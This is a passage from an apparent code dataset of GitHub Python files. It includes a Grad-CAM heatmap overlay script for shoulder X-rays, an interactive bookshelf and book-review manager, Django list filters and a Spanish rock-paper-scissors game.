ET.iterparse(filename):\n keys = key_type(element, keys)\n\n return keys\n\n\nkeys = process_map('new-york_new-york.osm')\npprint.pprint(keys)","repo_name":"qinliu1023/wrangle_data_2","sub_path":"check_keys.py","file_name":"check_keys.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26570733125","text":"import os\nfrom tqdm import tqdm\nfrom utils import *\n\ncam_dir = './CAM/'\nsavedir = './Full_CAM/'\nos.makedirs(savedir,exist_ok=True)\ncropdata_dir='./preprocessing_data/test/'\ndatas=glob.glob('./data/test/shoulder_image/*')\nfor data in tqdm(datas):\n img=cv2.imread(data,0)\n\n cams_r = glob.glob(cam_dir+data.split('/')[-1].replace('.png','')+'_r_*gradcam*')\n cams_l = glob.glob(cam_dir+data.split('/')[-1].replace('.png','')+'_l_*gradcam*')\n\n maskimg = cv2.imread(data.replace('/shoulder_image/', '/shoulder_mask/'), 0)\n\n maskimg = cv2.resize(maskimg,img.shape[::-1])\n maskimg[maskimg>0]=1\n maskimg[int(maskimg.shape[0] / 2):, :] = 0\n\n w, h=maskimg.shape[::-1]\n padding_val = int(w/2) if w>h else int(h/2)\n maskimg = cv2.copyMakeBorder(maskimg, padding_val, padding_val, padding_val, padding_val, cv2.BORDER_CONSTANT, value=0)\n img = cv2.copyMakeBorder(img, padding_val, padding_val, padding_val, padding_val, cv2.BORDER_CONSTANT, value=0)\n\n full_cam = maskimg.copy()\n full_cam[full_cam!=0]=0\n leftmask = maskimg.copy()\n leftmask[:, int(maskimg.shape[0]/2):] = 0\n rightmask = maskimg.copy()\n rightmask[:, :int(maskimg.shape[0]/2)] = 0\n\n\n if len(cams_r)>0:\n\n cropshape, croplist=find_center(rightmask)\n shape_size = 
np.max(cropshape.shape)\n shape_size = 512 if shape_size < 512 else int(shape_size * 2 / 3)\n center_point = [int((croplist[0]+croplist[1])/2),int((croplist[2]+croplist[3])/2)]\n full_cam[center_point[0] - shape_size:center_point[0] + shape_size,\n center_point[1] - shape_size:center_point[1] + shape_size]= cv2.resize(cv2.imread(cams_r[0],0),(shape_size*2,shape_size*2))\n\n if len(cams_l) > 0:\n\n cropshape, croplist=find_center(leftmask)\n shape_size = np.max(cropshape.shape)\n shape_size = 512 if shape_size < 512 else int(shape_size * 2 / 3)\n center_point = [int((croplist[0] + croplist[1]) / 2), int((croplist[2] + croplist[3]) / 2)]\n full_cam[center_point[0] - shape_size:center_point[0] + shape_size,\n center_point[1] - shape_size:center_point[1] + shape_size]=cv2.resize(cv2.flip(cv2.imread(cams_l[0],0),1),(shape_size*2,shape_size*2))\n\n img=cv2.merge([img,img,img])\n full_cam=cv2.applyColorMap(full_cam,colormap=cv2.COLORMAP_JET)\n img=img[padding_val:-padding_val,padding_val:-padding_val]\n full_cam = full_cam[padding_val:-padding_val, padding_val:-padding_val]\n cam_img=cv2.addWeighted(img,0.6,full_cam,0.4,0)\n cv2.imwrite(savedir+data.split('/')[-1],cam_img)\n\n","repo_name":"kskim-phd/FPAR","sub_path":"Overlay_Heatmap_and_image.py","file_name":"Overlay_Heatmap_and_image.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36556376323","text":"'''A program to manage my bookshelves, books, and reviews.'''\n\nimport pickle\nimport functools\nimport time\nimport os\n\n\nclass Bookshelf():\n '''An entity that represents a place for all my books.'''\n\n bookshelf_count = 0\n bookshelves = []\n\n def __init__(self, name=\"bookshelf\"):\n self.name = name\n self.books = []\n Bookshelf.bookshelves.append(self)\n Bookshelf.bookshelf_count += 1\n self.books_count = 0\n self.reviews_count = 0\n self.filtered_books = self.books.copy()\n self.filter = 'All Books'\n self.sort_val = 'None'\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n @classmethod\n def load_bookshelf(cls, file):\n return pickle.load(open(file, \"rb\"))\n\n def save_bookshelf(self):\n pickle.dump(self, open(f\"{self.name}.bkshlf\", \"wb\"))\n\n def get_books(self):\n return self.filtered_books\n\n def get_bookshelves():\n return Bookshelf.bookshelves\n\n def reset_bookshelf(self):\n Bookshelf.bookshelf_count = len(Bookshelf.bookshelves)\n self.filtered_books = self.books.copy()\n self.books_count = 0\n self.reviews_count = 0\n self.filter = 'All Books'\n self.sort_val = 'None'\n for book in self.filtered_books:\n self.books_count += 1\n book.reviews_count = len(book.reviews)\n self.reviews_count += len(book.reviews)\n\n def add_book(self, book=None):\n \"\"\"Add a book to the bookshelf.\n If a book is not provided, user will be prompted to add the book manually.\"\"\"\n if book is None:\n book = Book(bookshelves=[self])\n self.books.append(book)\n self.filtered_books.append(book)\n self.books_count += 1\n print(f\"\\n{book.get_book_info()}\\n\\n{book} added to {self.name}\")\n\n def filter_books(self):\n self.filtered_books = self.filtered_books[0:2]\n self.filter = '1st 2 books'\n \n def filter_books_status(self, status = None):\n if status is not None:\n temp_books = []\n for book in self.filtered_books:\n if book.book_status == status:\n temp_books.append(book)\n self.filtered_books = temp_books\n self.filter = status\n \n def sort_books(self, sort_val = 'Title', reverse_arg = 
False):\n for book in self.filtered_books:\n book.sort_val = book.sort_book(sort_val)\n self.filtered_books = sorted(self.filtered_books, reverse = reverse_arg)\n self.sort_val = sort_val\n \n def print_bookshelf_summary(self):\n \"\"\"Print the summary information for the the bookshelf.\"\"\"\n print(f'\\nBookshelf: {self}\\nFilter: {self.filter}\\nSort: {self.sort_val}')\n print(f'Books: {self.books_count}\\nReviews: {self.reviews_count}')\n\n def print_books_titles(self, sort_val=None):\n \"\"\"Print the book titles for all books in the bookshelf,\n sorted by the sort method (if provided).\"\"\"\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n print(book.get_title())\n else:\n print(\"No books to print: Bookshelf is empty! Find some books!\")\n\n def print_books_info(self, sort_val=None):\n \"\"\"Print the full book information for all books in the bookshelf (not including reviews),\n sorted by the sort method (if provided).\"\"\"\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n print(book.get_book_info(), '\\n')\n else:\n print(\n \"No books to print info: Bookshelf is empty! Find some books!\"\n )\n\n def print_reviews(self, sort_val=None):\n \"\"\"Print the full review information for all books in the bookshelf,\n sorted by the sort method (if provided).\"\"\"\n\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n book.print_reviews()\n print()\n else:\n print(\n \"No books to print reviews for: Bookshelf is empty! 
Find some books!\"\n )\n\n def print_ascii_books(self,\n sort_val=None,\n letters_per_ascii_book=20,\n ascii_books_per_row=14):\n '''method to print the bookshelf in ascii art format, sorted by the value provided.\n The height of each shelf/book can be controlled by the letters_per_ascii_book, and\n the width can be controlled by the ascii_books_per_row.\n\n Format inspired by https://codegolf.stackexchange.com/questions/111833/ascii-bookshelves'''\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n print(f'\\n Bookshelf: {self}\\t\\tFilter: {self.filter}\\tSort: {self.sort_val}')\n books = [book.get_title() for book in self.filtered_books]\n num_books = len(books)\n books_count = len(books)\n k = '|' + '-----' * ascii_books_per_row + '|'\n if books_count:\n while books_count:\n books_in_row = books_count % ascii_books_per_row or ascii_books_per_row\n print(k + '\\n' +\n ('|' + ' ' * (ascii_books_per_row - books_in_row) +\n '/___/' * books_in_row + '|'))\n num_letters = letters_per_ascii_book\n while num_letters:\n book_string = ''\n col_string = ''\n for i in range(0, books_in_row):\n temp_book = books[num_books - books_count + i]\n if letters_per_ascii_book - num_letters < len(\n temp_book):\n book_string_letter = temp_book[\n letters_per_ascii_book - num_letters]\n else:\n book_string_letter = ' '\n book_string += f'| {book_string_letter} |'\n col_string += f' {num_books - books_count + i + 1:-2} '\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n book_string + '|')\n num_letters -= 1\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n \"^---^\" * books_in_row + '|' + '\\n' + k)\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n col_string + '|')\n books_count -= books_in_row\n else:\n print(k + '\\n' + ('|' + ' ' * ascii_books_per_row + '|' + '\\n') *\n (letters_per_ascii_book + 2) + k)\n print(\"No books to print: Bookshelf is empty! 
Find some books!\")\n\n\n@functools.total_ordering\nclass Book():\n '''An entity that represents a book and associated data.\n\n Class Attributes:\n book_count\n book_statuses = 1: 'Want to Read',\n 2: 'Reviewed',\n 3: 'Read_No_Review',\n 4: 'Don't want to read'\n\n Instance Attributes:\n title\n author\n isbn\n url (to Amazon/goodreads/etc.)\n recommended_by (who recommended the book)\n other (text field for whatever additional notes the user would like to record about the book,\n not including review information)\n book_status - (Want to Read, Reviewed, Read_No_Review, Don't want to read)\n bookshelves (list of bookshelves the book has been added to)\n reviews\n\n Methods:\n get_title\n get_book_info\n print_reviews\n add_review\n '''\n book_count = 0\n\n book_statuses = {\n 1: \"Want to Read\",\n 2: \"Reviewed\",\n 3: \"Read, but not reviewed\",\n 4: \"Don't want to read\"\n }\n\n add_book_statuses = {\n 1: \"Want to Read\",\n 2: \"Want to Review\",\n 3: \"Read, but don\\'t want to review now\",\n 4: \"Don't want to read\"\n }\n\n def __init__(self,\n title=None,\n author=None,\n isbn=None,\n url=None,\n recommended_by=None,\n other=None,\n book_status=1,\n bookshelves=[],\n review=None):\n if title is None:\n self.title = input(\"Enter a title: \")\n self.author = input(\"Enter the author: \")\n self.isbn = input(\"Enter the ISBN (if you have one): \")\n self.url = input(\n \"Enter a url for Amazon/Goodreads/etc.(if you have one): \")\n self.recommended_by = input(\n \"Enter details for who recommended the book (if you have one): \"\n )\n print(\"Enter any additional notes the you would like to record about the book,\")\n self.other = input(\"not including review information: \")\n self.book_status = self.input_book_status()\n self.bookshelves = bookshelves\n self.sort_val = self.title\n else:\n self.title = title\n self.author = author\n self.isbn = isbn\n self.url = url\n self.recommended_by = recommended_by\n self.other = other\n self.book_status = Book.book_statuses[book_status]\n self.bookshelves = bookshelves\n self.sort_val = self.title\n if review is None:\n self.reviews = []\n if self.book_status == 'Reviewed':\n print('\\nWould you like to review this book now? (1 = Yes, Anything else = No)')\n try:\n if int(input('Entry: ')) == 1:\n self.add_review()\n else:\n raise\n except:\n self.book_status = Book.book_statuses[3]\n print(f\"Changing book status to: {self.book_status}\")\n else:\n self.add_review(review)\n Book.book_count += 1\n \n def __lt__(self, other):\n try:\n return self.sort_val < other.sort_val\n except:\n return False\n\n def __eq__(self, other):\n try:\n return self.sort_val == other.sort_val\n except:\n return False\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n def get_title(self):\n return self.title\n\n def get_book_info(self):\n\n return f\"{self}\\n\\\n Author: {self.author}\\n\\\n ISBN: {self.isbn}\\n\\\n url: {self.url}\\n\\\n Recommended by: {self.recommended_by}\\n\\\n Other: {self.other}\\n\\\n Status: {self.book_status}\\n\\\n Bookshelves: {', '.join(str(bookshelf) for bookshelf in self.bookshelves)}\\n\\\n Reviews: {len(self.reviews)}\"\n\n def sort_book(self, sort_val = 'Title'):\n '''method to return a value by which a book can be sorted. 
if no sort_val is provided, will return self.title.'''\n\n print(sort_val)\n if sort_val == 'Author':\n return self.author\n if sort_val == 'ISBN':\n return self.isbn\n if sort_val == 'url':\n return self.url\n if sort_val == 'Recommended by':\n return self.recommended_by\n if sort_val == 'Other':\n return self.other\n if sort_val == 'Status':\n return self.book_status\n if sort_val == '# of Reviews':\n return len(self.reviews)\n if sort_val == 'Latest Review Rating':\n if len(self.reviews) == 0:\n return 0\n else:\n return self.reviews[-1].rating\n else:\n return self.title\n\n\n def add_to_bookshelf(self, bookshelf=None):\n '''method to add a book to a bookshelf and prompt user if no bookshelf provided.\n Possible states:\n 1. bookshelf provided\n 2. No bookshelf provided - user prompted to pick a bookshelf or add a bookshelf'''\n if bookshelf is None:\n bookshelves = Bookshelf.bookshelves\n counter = 0\n words = f\"Choose a bookshelf to add {self} to:\\n\\\n Enter 'a' to add a new bookshelf\"\n\n for existing_bookshelf in bookshelves:\n words += f\"\\n\\tEnter '{counter}' to add to {existing_bookshelf}\"\n counter += 1\n words += f\"\\nBookshelf choice: \"\n while True:\n chosen_bookshelf = input(words).lower()\n if chosen_bookshelf == 'a' or int(chosen_bookshelf) in range(\n 0, counter):\n if chosen_bookshelf == 'a':\n bookshelf = Bookshelf()\n else:\n bookshelf = bookshelves[int(chosen_bookshelf)]\n break\n else:\n print(\"\\nPlease try again\")\n\n bookshelf.add_book(self)\n print(f\"{self} added to {bookshelf}\")\n\n def input_book_status(self):\n '''method to gather book_status from users, until the user inputs a valid book_status. \n Possible states:\n 1. no book_status provided\n 2. book_status provided is not in range\n 3. book_status is ok'''\n\n while True:\n print('Enter a number corresponding to the book_status of the book:')\n for item in Book.book_statuses:\n print(f'\\t{item} = \"{Book.add_book_statuses[item]}\"')\n book_status_option = input('\\tEntry: ')\n\n try:\n book_status_option = int(book_status_option)\n if book_status_option in Book.book_statuses.keys():\n break\n else:\n raise\n except:\n print(f\"Your entry '{book_status_option}' is not recognized\\n\")\n return Book.book_statuses[book_status_option]\n\n\n def add_review(self, review=None):\n print(f'Reviewing {self}:')\n if review is None:\n self.reviews.append(Review(self))\n else:\n self.reviews.append(review)\n self.book_status = Book.book_statuses[2]\n for bookshelf in self.bookshelves:\n bookshelf.reviews_count += 1\n\n print(f\"\\nReview added to {self.title}:\\n\\\n {self.reviews[-1]}\")\n\n def print_reviews(self, sort_val=None):\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n reviews_sorted = self.reviews\n\n if reviews_sorted:\n for review in reviews_sorted:\n print(review, '\\n')\n else:\n print(f\"{self.title}: No reviews yet!\")\n\n\nclass Review():\n '''An entity that represents a book review and associated data.\n\n Class Attributes:\n rating (1-5)\n review_count\n formats = 1: \"Physical Book\",\n 2: \"eBook\",\n 3: \"Audiobook\",\n 4: \"Other\"\n\n Instance Attributes:\n title (title of the book being reviewed)\n rating (1-5)\n start_date\n end_date\n big_idea\n other_notes_takeaways\n format_consumed\n\n Methods:\n get_title\n '''\n formats = {1: \"Physical Book\", 2: \"eBook\", 3: \"Audiobook\", 4: \"Other\"}\n rating_range = range(1,6)\n\n review_count = 0\n rating = range(1, 5)\n\n def __init__(self,\n book=None,\n rating=None,\n 
start_date=None,\n end_date=None,\n big_idea=None,\n other_notes_takeaways=None,\n format_consumed=4):\n if book is None:\n raise Exception(\"Need a book!\")\n elif rating is None:\n self.title = book.title\n self.rating = self.verify_rating(rating) #add/verify the rating\n self.start_date = input(\"Enter a start_date: \")\n self.end_date = input(\"Enter a end_date: \")\n self.big_idea = input(\"Enter the big_idea: \")\n self.other_notes_takeaways = input(\"Enter other_notes_takeaways: \")\n self.format_consumed = self.input_format() \n else:\n self.title = book.title\n self.rating = self.verify_rating(rating) #add/verify the rating\n self.start_date = start_date\n self.end_date = end_date\n self.big_idea = big_idea\n self.other_notes_takeaways = other_notes_takeaways\n self.format_consumed = Review.formats[format_consumed]\n Review.review_count += 1\n\n def input_format(self):\n '''method to gather format from users, until the user inputs a valid format. \n Possible states:\n 1. no format provided\n 2. format provided is not in range\n 3. format is ok'''\n\n while True:\n print('Enter a number corresponding to the format of the book:')\n for item in Review.formats:\n print(f'\\t{item} = \"{Review.formats[item]}\"')\n format_option = input('\\tEntry: ')\n\n try:\n format_option = int(format_option)\n if format_option in Review.formats.keys():\n break\n else:\n raise\n except:\n print(f\"Your entry '{format_option}' is not recognized\\n\")\n return Review.formats[format_option]\n\n def verify_rating(self, rating=None):\n '''method to verify if rating is in the rating_range. Possible states:\n 1. no rating provided\n 2. rating provided is not in range\n 3. rating is ok'''\n if rating is None:\n rating = input(f\"\\nEnter a rating ({Review.rating_range[0]}-{Review.rating_range[-1]} as an integer): \")\n while rating not in Review.rating_range or not isinstance(rating, int):\n try:\n rating = int(rating)\n if rating not in range(1, 6):\n raise\n except:\n rating = input(\n \"Invalid entry - please enter a rating (1-5 as an integer): \"\n )\n return rating\n\n def get_title(self):\n return self.title\n\n def __repr__(self):\n return f\"{self.title}\\n\\\n rating: {self.rating}\\n\\\n start_date: {self.start_date}\\n\\\n end_date: {self.end_date}\\n\\\n Big Idea: {self.big_idea}\\n\\\n Other notes & takeaways: {self.other_notes_takeaways}\\n\\\n format_consumed: {self.format_consumed}\"\n\n def __str__(self):\n return f\"{self.title}\\n\\\n rating: {self.rating}\\n\\\n start_date: {self.start_date}\\n\\\n end_date: {self.end_date}\\n\\\n Big Idea: {self.big_idea}\\n\\\n Other notes & takeaways: {self.other_notes_takeaways}\\n\\\n format_consumed: {self.format_consumed}\"\n\n\nclass BookshelfManager:\n \"\"\"This class creates new/loads instances of the bookshelf, book, and review objects\n and allows for user interaction\"\"\"\n\n menu = {\n 'L': '(L)ist my books',\n 'F': '(F)ilter my books',\n 'T': 'sor(T) my books',\n 'G': '(G)et the info about a book',\n 'A': '(A)dd a book',\n 'R': '(R)eview a book',\n 'C': 'save and (C)lose',\n 'Q': '(Q)uit without saving',\n 'S': '(S)ettings'\n }\n \n settings_dict = {\n 'R': '(R)eset my bookshelf (filters, sort, and counters will return to factory settings)',\n 'E': '(E)xit to Main Menu',\n 'T': 'Test'\n }\n\n filters_dict = {\n '0': \"Filter by 1st 2 books\",\n '1': \"Filter by 'Want to Read'\",\n '2': \"Filter by 'Reviewed'\",\n '3': \"Filter by 'Read, but not reviewed'\",\n '4': \"Filter by 'Don't want to read'\",\n 'R': '(R)eset my bookshelf (filters, 
sort, and counters will return to factory settings)',\n 'E': '(E)xit to Main Menu'\n }\n\n sorts_dict = {\n '0': 'Title',\n '1': 'Author',\n '2': 'ISBN',\n '3': 'url',\n '4': 'Recommended by',\n '5': 'Other',\n '6': 'Status',\n '7': '# of Reviews',\n '8': 'Latest Review Rating',\n 'E': '(E)xit to Main Menu'\n }\n \n def __init__(self):\n '''Generate new interaction instance and allow users to interact with their bookshelves\n until the user selects save and close = \"C\"'''\n self.intro() # introduce the program\n self.load_or_add_bookshelf() # load or add a bookshelf\n\n while True:\n\n #Prompt to save and close\n menu = BookshelfManager.menu\n menu_option = \"\"\n while True:\n print('\\nMain Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in menu:\n print(f'\\t({item}) to {menu[item]}')\n menu_option = input('\\nEntry: ').upper()\n if menu_option in menu:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{menu_option}' is not recognized\")\n if menu_option == \"L\":\n self.list_books()\n elif menu_option == \"F\":\n self.filter_books()\n elif menu_option == \"T\":\n self.sort_books()\n elif menu_option == \"G\":\n self.get_book_info()\n elif menu_option == \"A\":\n self.bookshelf.add_book()\n elif menu_option == \"R\":\n self.review_a_book()\n elif menu_option == \"S\":\n self.settings()\n elif menu_option == \"Q\":\n os.system('clear')\n print('Are you sure you want to quit? All your work will be lost!')\n print(\"Enter 'Quit' to confirm that you want to quit without saving\")\n quit_entry = input('\\nEntry: ')\n if quit_entry == 'Quit':\n print('Have a wonderful day!\\n')\n break\n else:\n print(f\"Your entry '{quit_entry}' did not match the characters 'Quit'\")\n elif menu_option == \"C\":\n self.bookshelf.save_bookshelf()\n print(f'{self.bookshelf} saved as {self.bookshelf}.bkshlf. 
Have a wonderful day!\\n')\n break\n\n\n\n def intro(self):\n print()\n print(\"Let's manage our bookshelf.\")\n print()\n print(\"You will be prompted to load an existing bookshelf or set up a new one.\")\n print(\"Then you will have the opportunity to add books and reviews.\")\n print(\"You can see the books on your bookshelf, and select them to see their details.\")\n print(\"First let's set up your bookshelf.\")\n time.sleep(0)\n print()\n\n def load_or_add_bookshelf(self):\n load_or_add = \"\"\n while True:\n print('Would you like to load an existing bookshelf, or add a new one?')\n load_or_add = input(\n 'Enter (L) to load an existing bookshelf or (A) to add a new bookshelf\\nEntry: '\n ).upper()\n if load_or_add == \"L\" or load_or_add == \"A\":\n break\n if load_or_add == \"A\":\n os.system('clear')\n bookshelf_name = input(\n \"What would you like to call your new bookshelf?\\n\")\n self.bookshelf = Bookshelf(bookshelf_name)\n print(f'\\n{self.bookshelf} created!\\n')\n else:\n os.system('clear')\n while True:\n try:\n bookshelf_file = input(\n \"What is the file name (with path) of the bookshelf you would like to load?\\n(Type 'C' to Cancel)\\n\"\n )\n if bookshelf_file.upper() == 'C':\n self.load_or_add_bookshelf()\n break\n else:\n self.bookshelf = Bookshelf.load_bookshelf(bookshelf_file)\n break\n except:\n print(f\"Could not find a file with the name '{bookshelf_file}'\")\n self.bookshelf.reset_bookshelf()\n print(f'\\n\"{self.bookshelf}\" bookshelf loaded:')\n self.bookshelf.print_bookshelf_summary()\n print()\n\n def list_books(self):\n os.system('clear')\n self.bookshelf.print_ascii_books()\n\n def settings(self):\n while True:\n\n #Prompt to choose settings\n settings_dict = BookshelfManager.settings_dict\n settings_option = \"\"\n while True:\n print('\\nSettings Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in settings_dict:\n print(f'\\t({item}) to {settings_dict[item]}')\n settings_option = input('\\nEntry: ').upper()\n if settings_option in settings_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{settings_option}' is not recognized\")\n if settings_option == \"R\":\n self.bookshelf.reset_bookshelf()\n print(f\"\\nFilters, sort, and counters for '{self.bookshelf}' have been reset to factory settings.\\n\")\n if settings_option == \"T\":\n print(f'self.bookshelf: {self.bookshelf}')\n print(f'self.bookshelf.books: {self.bookshelf.books}')\n print(f'self.bookshelf.books[0]: {self.bookshelf.books[0]}')\n print(f'self.bookshelf.books[0].bookshelves: {self.bookshelf.books[0].bookshelves}')\n elif settings_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n \n \n def filter_books(self):\n while True:\n\n #Prompt to choose filter or sort\n filters_dict = BookshelfManager.filters_dict\n filters_option = \"\"\n while True:\n print('\\nFilter & Sort Menu\\nWhat would you like to do next?\\n\\nEnter: ')\n for item in filters_dict:\n print(f'\\t({item}) to {filters_dict[item]}')\n filters_option = input('\\nEntry: ').upper()\n if filters_option in filters_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{filters_option}' is not recognized\")\n if filters_option == \"R\":\n self.bookshelf.reset_bookshelf()\n print(f\"\\nFilters, sort, and counters for '{self.bookshelf}' have been reset to factory settings.\\n\")\n elif filters_option == \"0\":\n self.bookshelf.filter_books()\n print(f\"\\n'{self.bookshelf}' has been filtered by the first 2 books in the list.\\n\")\n elif filters_option in ['1', '2', '3', '4']:\n 
self.bookshelf.filter_books_status(Book.book_statuses[int(filters_option)])\n print(f\"\\n'{self.bookshelf}' has been filtered by books with a status of {filters_dict[filters_option]}.\\n\")\n elif filters_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n\n def sort_books(self):\n while True:\n\n #Prompt to choose filter or sort\n sorts_dict = BookshelfManager.sorts_dict\n sort_option = \"\"\n while True:\n print('\\nSort Menu\\nHow would you like to Sort?\\n\\nEnter: ')\n for item in sorts_dict:\n print(f'\\t({item}) to sort by {sorts_dict[item]}')\n sort_option = input('\\nEntry: ').upper()\n if sort_option in sorts_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{sort_option}' is not recognized\")\n if sort_option == \"E\":\n print(f'Returning to Main Menu\\n')\n break\n while True:\n\n #Prompt to choose ascending or descending\n sort_order_dict = {'A':' (A)scending', 'D':' (D)scending'}\n sort_order = \"\"\n while True:\n print('\\nAscending or Descending?\\n\\nEnter: ')\n for item in sort_order_dict:\n print(f'\\t({item}) to sort by {sort_order_dict[item]}')\n sort_order = input('\\nEntry: ').upper()\n if sort_order in sort_order_dict:\n break\n else:\n os.system('clear')\n print(f\"Your entry '{sort_order}' is not recognized\")\n if sort_order == \"D\":\n reverse_option = True \n else:\n reverse_option = False\n self.bookshelf.sort_books(sort_val = sorts_dict[sort_option], reverse_arg = reverse_option)\n print(f\"\\n'{self.bookshelf}' has been sorted by book {sorts_dict[sort_option]} {sort_order_dict[sort_order]}.\\n\")\n break\n \n \n def choose_book(self):\n self.list_books()\n if self.bookshelf.books_count > 0:\n if self.bookshelf.books_count == 1:\n book_choice = 1\n print(f'{self.bookshelf.books[book_choice - 1]} is your only book:')\n else:\n book_choice = self.input_book_choice()\n return self.bookshelf.books[book_choice - 1]\n\n def get_book_info(self):\n book_choice = self.choose_book()\n print('\\n' + book_choice.get_book_info() +\n '\\n\\nReview(s): ')\n book_choice.print_reviews()\n \n def review_a_book(self):\n book_choice = self.choose_book()\n book_choice.add_review()\n\n def input_book_choice(self):\n '''method to gather a book choice from users, until the user inputs a valid book choice. \n Possible states:\n 1. no book choice provided\n 2. book choice provided is not in range\n 3. book choice is ok'''\n\n while True:\n print(\"Which book would you like? 
(Enter the number below the book on the bookshelf)\")\n book_choice = input('Entry: ')\n print()\n\n try:\n book_choice = int(book_choice)\n if (book_choice - 1) in range(0, self.bookshelf.books_count):\n break\n else:\n raise\n except:\n print(f\"Your entry '{book_choice}' is not recognized\\n\")\n return book_choice\n\n\n# Main Bookshelf Program - Conor Healy\n# The main program prompts the user to load a bookshelf or create a new one.\n\nos.system('clear')\nBookshelfManager()\n","repo_name":"revgizmo/goodreads_manager","sub_path":"continuing dev/archive/CopyOfbookshelf_all.py","file_name":"CopyOfbookshelf_all.py","file_ext":"py","file_size_in_byte":31185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"25471203612","text":"import django_filters\nfrom django import forms\nfrom interactions.models import Interaction, Keyword\nfrom main.constants import PROJECT_ORDERING, COMPANY_ORDERING\nfrom someapp.models import Company, Project\n\n\nclass CompanyFilter(django_filters.FilterSet):\n \"\"\"Ordering filter for list of companies\"\"\"\n o = django_filters.OrderingFilter(\n fields=(\n ('title', 'title'),\n ('created_date', 'created_date'),\n ),\n choices=COMPANY_ORDERING,\n empty_label=None\n )\n\n class Meta:\n model = Company\n fields = ['title', 'created_date']\n\n\nclass ProjectFilter(django_filters.FilterSet):\n \"\"\"Ordering filter for list of projects\"\"\"\n o = django_filters.OrderingFilter(\n fields=(\n ('title', 'title'),\n ('begin', 'begin'),\n ('end', 'end'),\n ),\n choices=PROJECT_ORDERING,\n empty_label=None\n )\n\n class Meta:\n model = Project\n fields = ['title', 'begin', 'end', ]\n\n\nclass Filter(django_filters.FilterSet):\n \"\"\"Filter project interactions by keywords\"\"\"\n keyword = django_filters.ModelMultipleChoiceFilter(\n field_name='keyword__title',\n to_field_name='title',\n widget=forms.CheckboxSelectMultiple,\n label='Keywords',\n queryset=Keyword.objects.all()\n )\n\n class Meta:\n model = Interaction\n fields = ['keyword', ]","repo_name":"Navi-n-Don/crm-project","sub_path":"main/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12963669452","text":"from random import choice\r\n\r\ndef opciones():\r\n while True:\r\n try:\r\n entrada = int(input(\"\\n¿Qué eliges?\\n1. Piedra.\\n2. Papel.\\n3. 
Tijera.\\nOpción: \"))\r\n\r\n if entrada == 1:\r\n opcion_jugador = \"Piedra\"\r\n print(\"\\nIngresaste Piedra\")\r\n return opcion_jugador\r\n break\r\n\r\n elif entrada == 2:\r\n opcion_jugador = \"Papel\"\r\n print(\"\\nIngresaste Papel\")\r\n return opcion_jugador\r\n break\r\n\r\n elif entrada == 3:\r\n opcion_jugador = \"Tijera\"\r\n print(\"\\nIngresaste Tijera\")\r\n return opcion_jugador\r\n break\r\n\r\n else:\r\n print(\"\\nHas seleccionado una opción no disponible.\")\r\n\r\n except:\r\n print(\"\\nSolo se permiten números.\")\r\n\r\ndef jugar(opcion_jugador):\r\n opcion_pc = choice([\"Piedra\", \"Papel\", \"Tijera\"])\r\n print(f\"Mi elección fue {opcion_pc}, entonces...\",end=\" \")\r\n\r\n if opcion_pc == opcion_jugador:\r\n return \"HEMOS QUEDADO EMPATE\"\r\n elif opcion_pc == \"Piedra\" and opcion_jugador == 'Tijera':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Tijera\" and opcion_jugador == 'Piedra':\r\n return \"HAS GANADO\"\r\n elif opcion_pc == \"Papel\" and opcion_jugador == 'Piedra':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Piedra\" and opcion_jugador == 'Papel':\r\n return \"HAS GANADO\"\r\n elif opcion_pc == \"Tijera\" and opcion_jugador == 'Papel':\r\n return \"HE GANADO\"\r\n elif opcion_pc == \"Papel\" and opcion_jugador == 'Tijera':\r\n return \"HAS GANADO\"\r\n\r\ndef main():\r\n i = 1\r\n while i == 1:\r\n opcion_jugador = opciones()\r\n resultado = jugar(opcion_jugador)\r\n if resultado == None:\r\n pass\r\n else:\r\n print(resultado)\r\n \r\n seguir = input(\"\\nIngresa 1 para seguir jugando conmigo, sino, ingresa otro número: \")\r\n try:\r\n int(seguir)\r\n except:\r\n print(\"\\nNo ingesaste un número, sigamos jugando.\\n\")\r\n\r\nmain()","repo_name":"xAGH/UPB","sub_path":"Ciclo 1/Fundamentos de programación 51633/Practicas/Olimpiadas/piedra_papel_tijera.py","file_name":"piedra_papel_tijera.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3458236906","text":"\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nplt.figure(figsize=(10,8))\nx = np.linspace(start=-1, stop=2, 